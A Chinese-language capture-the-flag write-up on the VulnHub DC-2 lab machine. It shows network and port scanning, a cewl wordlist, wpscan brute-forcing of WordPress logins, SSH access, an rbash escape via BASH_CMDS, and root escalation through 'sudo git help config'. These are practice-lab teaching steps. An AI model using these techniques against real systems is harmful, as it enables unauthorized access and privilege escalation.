0
点赞
收藏
分享

微信扫一扫

靶机渗透练习70-DC2

一葉_code 2022-04-21 阅读 42
web安全

靶机描述

靶机地址:http://www.vulnhub.com/entry/dc-2,311/

一、搭建靶机环境

攻击机Kali

靶机

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

⬢  DC2  arp-scan -I eth0 -l 
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     08:00:27:c6:db:e9       PCS Systemtechnik GmbH
192.168.9.68    08:00:27:e8:e7:b0       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.914 seconds (133.75 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  DC2  nmap -A -sV -T4 -p- 192.168.9.68   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 16:21 CST
Nmap scan report for bogon (192.168.9.68)
Host is up (0.00039s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:E8:E7:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.39 ms bogon (192.168.9.68)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.24 seconds

开放了一下端口:

80—http—Apache httpd 2.4.10 ((Debian))

7744—ssh—OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

2.2枚举漏洞

2.2.1 80 端口分析

描述里说需要修改hosts,咱们修改一下/etc/hosts

192.168.9.68 dc-2

访问:http://dc-2/

进入网页后发现,是WP搭建的网站,同时发现flag,进入flag,找到flag1

image-20220408162713952

翻译过来的意思是

image-20220408162804472

提示咱们使用cewl构造字典

运行命令:cewl http://dc-2 -w 2.txt

image-20220408163210154

因为咱们一开始就发现了是WP网站,这里可以使用wpscan工具进行爆破

关于wpscan工具,首次使用需要更新一下

如果有报错,就apt-get update & apt-get upgrade更新一下

再重新安装一下gem install wpscan,再wpscan -update,其实重新安装的时候就已经是最新版了

接下来继续使用该工具进行爆破

wpscan --url http://dc-2 -P 2.txt

image-20220408163506370

通过爆破得到了用户名及密码

目录扫描一下

⬢  DC2  dirsearch -u http://dc-2               

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/dc-2/_22-04-08_16-36-05.txt

Error Log: /root/.dirsearch/logs/errors-22-04-08_16-36-05.log

Target: http://dc-2/

[16:36:05] Starting: 
[16:36:06] 403 -  290B  - /.ht_wsr.txt
[16:36:06] 403 -  293B  - /.htaccess.bak1
[16:36:06] 403 -  295B  - /.htaccess.sample
[16:36:06] 403 -  293B  - /.htaccess.save
[16:36:06] 403 -  293B  - /.htaccess.orig
[16:36:06] 403 -  291B  - /.htaccess_sc
[16:36:06] 403 -  294B  - /.htaccess_extra
[16:36:06] 403 -  291B  - /.htaccessOLD
[16:36:06] 403 -  291B  - /.htaccessBAK
[16:36:06] 403 -  293B  - /.htaccess_orig
[16:36:06] 403 -  292B  - /.htaccessOLD2
[16:36:06] 403 -  283B  - /.htm
[16:36:06] 403 -  284B  - /.html
[16:36:06] 403 -  293B  - /.htpasswd_test
[16:36:06] 403 -  290B  - /.httr-oauth
[16:36:06] 403 -  289B  - /.htpasswds
[16:36:07] 403 -  283B  - /.php
[16:36:07] 403 -  284B  - /.php3
[16:36:20] 301 -    0B  - /index.php  ->  http://dc-2/
[16:36:22] 200 -   19KB - /license.txt
[16:36:27] 200 -    7KB - /readme.html
[16:36:28] 403 -  292B  - /server-status
[16:36:28] 403 -  293B  - /server-status/
[16:36:32] 301 -  299B  - /wp-admin  ->  http://dc-2/wp-admin/
[16:36:32] 301 -  301B  - /wp-content  ->  http://dc-2/wp-content/
[16:36:32] 200 -    0B  - /wp-content/
[16:36:32] 200 -    0B  - /wp-config.php
[16:36:32] 200 -   69B  - /wp-content/plugins/akismet/akismet.php
[16:36:32] 500 -    0B  - /wp-content/plugins/hello.php
[16:36:32] 301 -  302B  - /wp-includes  ->  http://dc-2/wp-includes/
[16:36:32] 500 -    0B  - /wp-includes/rss-functions.php
[16:36:32] 200 -    0B  - /wp-cron.php
[16:36:32] 302 -    0B  - /wp-signup.php  ->  http://dc-2/wp-login.php?action=register
[16:36:32] 200 -    2KB - /wp-login.php
[16:36:33] 302 -    0B  - /wp-admin/  ->  http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:36:33] 200 -    1B  - /wp-admin/admin-ajax.php
[16:36:33] 405 -   42B  - /xmlrpc.php
[16:36:33] 200 -   40KB - /wp-includes/
[16:36:33] 500 -    4KB - /wp-admin/setup-config.php
[16:36:33] 200 -    1KB - /wp-admin/install.php

Task Completed

我们访问 wp-login.php进入到登录页面

访问:http://dc-2/wp-login.php

image-20220408163826704

image-20220408163859062

翻译一下

image-20220408163918306

2.2.2 7744端口分析

到这里,咱们回到扫出来的端口,除了80还有一个7744,7744这个端口对应的服务是open ssh

这里咱们利用刚才的提示,利用wp的账号密码进行ssh

经过测试,jerry不能进行ssh连接,tom可以

ssh tom@dc-2 -p 7744

⬢  DC2  ssh tom@dc-2 -p 7744
tom@dc-2's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ 

ls发现flag3cat,more好像被限制了

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$ 
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin
$ export PATH=$PATH:/usr/bin
$ ls
flag3.txt  usr
$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
$ 

image-20220408164415107

我擦,虽然翻译过来有点奇怪的意思,但大概的意思是让我们用jerry进行登录

还好刚才做了配置,不然估计su也用不了

切换成功后,进入jerry目录下,发现了flag4

jerry@DC-2:/home/tom$ cd ..
jerry@DC-2:/home$ ls
jerry  tom
jerry@DC-2:/home$ cd jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

jerry@DC-2:~$ 

image-20220408164625581

2.3漏洞利用

。。。。。

2.4权限提升

2.4.1 信息收集

查找一下suid程序: find / -perm -u=s -type f 2>/dev/null

jerry@DC-2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
jerry@DC-2:~$ 

sudo -l查看一下

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

发现可以以root权限运行git程序(突然看到flag4末尾有git)

https://gtfobins.github.io搜索一下git提权

image-20220408165403668

1、sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

成功提权后拿到final-flag.txt

root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~# 

总结

本靶机通过cewl构造字典爆破wp站的登录账户密码,登录拿到提示信息,然后通过ssh登录账户进行信息收集,拿到提示信息后切换用户,最后再通过git提权

  1. 信息收集
  2. cewl构造字典
  3. wpscan的使用
  4. 目录扫描
  5. -rbash切换至/bin/sh
  6. sudo提权- git提权
举报

相关推荐

靶机渗透练习73-DC5

靶机渗透练习72-DC4

靶机渗透练习74-DC6

靶机渗透练习69-DC1

靶机渗透练习75-DC7

靶机渗透练习76-DC8

DC系列(5)DC-5靶机渗透

靶机渗透练习37-Corrosion2

0 条评论